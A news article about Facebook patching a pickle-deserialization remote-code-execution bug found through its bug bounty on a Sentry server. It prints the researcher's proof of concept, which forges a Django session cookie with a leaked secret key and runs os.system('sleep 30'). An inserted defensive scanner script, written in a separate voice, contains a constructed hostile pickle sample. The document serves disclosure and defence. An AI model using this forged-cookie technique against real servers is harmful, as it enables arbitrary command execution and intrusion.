Now that's a fortune cookie! Facebook splats $5k command-injection bug in one of its servers
Find flaw, report flaw, fix flaw, get paid. Bish, bash, bosh
Facebook has patched a remote-code execution flaw discovered in one of its servers.
Researcher Daniel 'Blaklis' Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.
Though remote code execution bugs are considered serious problems, Le Gall noted that no Facebook user data was ever exposed or accessed via the uncovered hole. The bug was patched this month prior to today's disclosure.
The programming blunder was spotted in a Facebook server running the Sentry log collection software.
"While I was looking at the application, some stacktraces regularly popped on the page, for an unknown reason," Le Gall explained. "The application seemed to be unstable regarding the user password reset feature, which occasionally crashed."
Looking through the logs, the researcher noted that he was able to see where in the stack the cookie details were handled, as well as spot where the application was using Pickle, a Python data serialization format that executes arbitrary code when it deserializes attacker-controlled data.
With that information, Le Gall was able to craft cookies that would run commands on the machine. Here is the proof-of-concept exploit: a crafted cookie that makes the server sleep for 30 seconds before responding, demonstrating command execution:
#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

# Django SECRET_KEY recovered from the leaked stacktraces
SECRET_KEY='[RETRIEVEDKEY]'

#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'

# Verify and unpickle the existing session exactly as the server would
newContent = django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')

# __reduce__ tells the unpickler to call os.system("sleep 30") on load
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))

newContent['testcookie'] = PickleRce()

# Re-sign the session with the stolen key; the server trusts the signature
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)
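As an added defensive example (not code from the article or from Le Gall), the script below undoes Django's signed-cookie layout the same way the exploit does and then scans the pickle opcode stream for anything that would import, instantiate or call code, without unpickling it. The benign cookie is the one quoted above; the hostile one is constructed here with placeholder timestamp and signature, and signatures are not verified, since a leaked key makes a valid signature meaningless.

```python
import base64
import io
import pickle
import pickletools
import zlib

# Opcodes that import, instantiate or call Python objects while loading.
# Session data never needs them: JSONSerializer cannot emit them at all.
CODE_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD", "INST", "OBJ",
                "NEWOBJ", "NEWOBJ_EX", "EXT1", "EXT2", "EXT4", "PERSID", "BINPERSID"}


def payload_bytes(cookie):
    """Undo Django signing.dumps(): '<[.]base64>:<timestamp>:<signature>'."""
    base64d = cookie.split(":", 1)[0]        # signature is not verified here
    compressed = base64d.startswith(".")     # marker set by dumps(compress=True)
    if compressed:
        base64d = base64d[1:]
    data = base64.urlsafe_b64decode(base64d + "=" * (-len(base64d) % 4))
    return zlib.decompress(data) if compressed else data


def scan_pickle(data):
    """List (opcode, argument) pairs that would run code on unpickle, without loading."""
    return [(op.name, arg) for op, arg, _ in pickletools.genops(data)
            if op.name in CODE_OPCODES]


class DataOnlyUnpickler(pickle.Unpickler):
    """Belt and braces: refuse to resolve any module attribute while loading."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def load_session(cookie):
    """Decode a PickleSerializer session only if it is plain data."""
    data = payload_bytes(cookie)
    hits = scan_pickle(data)
    if hits:
        raise pickle.UnpicklingError(f"code-executing opcodes in session: {hits}")
    return DataOnlyUnpickler(io.BytesIO(data)).load()


# The benign cookie quoted in the article; its payload is {"testcookie": "worked"}.
BENIGN = "gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw"
# Constructed sample: a protocol-2 pickle that merely resolves os.system (GLOBAL),
# wrapped in the cookie layout with placeholder timestamp and signature.
HOSTILE = (base64.urlsafe_b64encode(b"\x80\x02cos\nsystem\n.").rstrip(b"=").decode()
           + ":TIMESTAMP:SIGNATURE")

if __name__ == "__main__":
    print(load_session(BENIGN))                   # {'testcookie': 'worked'}
    print(scan_pickle(payload_bytes(HOSTILE)))    # [('GLOBAL', 'os system')]
```

The durable fix is the one Django defaults to: use JSONSerializer for sessions, so that a stolen SECRET_KEY lets an attacker forge session data but never code.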
Say what you will about Facebook, but the company's handling of bug reports appears to be on point. Le Gall said that the same day the flaw was reported, July 30, Facebook took down the server. Ten days later, a patch was in place and the server was brought back online.
The social network has made security a focal point in the aftermath of the Cambridge Analytica scandal, and in this case at least it appears to be paying off. ®